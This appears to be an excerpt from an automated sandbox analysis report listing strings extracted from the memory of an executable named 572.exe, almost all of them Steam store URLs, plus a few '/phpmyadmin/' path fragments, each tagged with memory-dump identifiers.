                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/genre/Early%20Access/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/genre/Free
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/genre/Free%20to%20Play/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/genre/Free%20to%20Play/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/greatondeck/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/greatondeck/?snr=1_4_4__category-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/hardware_recycling/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/join/?snr=1_4_4__more-content-login
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/labs/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/linux?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/login/?redir=&redir_ssl=1&snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/login/?snr=1_4_4__more-content-login
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/macos?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/collection/sales/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/newshub/?snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/newshub/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/pccafe/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/phpmyadmin/-dH
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/phpmyadmin/mw
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/phpmyadmin/ok.xyz22
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/phpmyadmin/qC
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/phpmyadmin/v
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/publisher/?snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/recommended/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/recommended/friendactivity/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/recommended/friendactivity/?snr=1_4_4__138
                Source: 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/recommender/?snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/remoteplay_hub/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sale/nextfest?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sale/quebec2024?snr=1_4_4__40_2
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sale/steam_awards?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sale/vr_specials/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=globaltopsellers&os=win&hidef2p=1&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=globaltopsellers&os=win&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=topsellers&os=win&hidef2p=1&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=topsellers&os=win&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=topsellers&snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=ut1&amp;category1=998&amp;os=&snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=ut2&amp;category1=998&amp;os=&snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?specials=1&snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?specials=1&snr=1_4_4__146
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/software/?snr=1_4_4__12
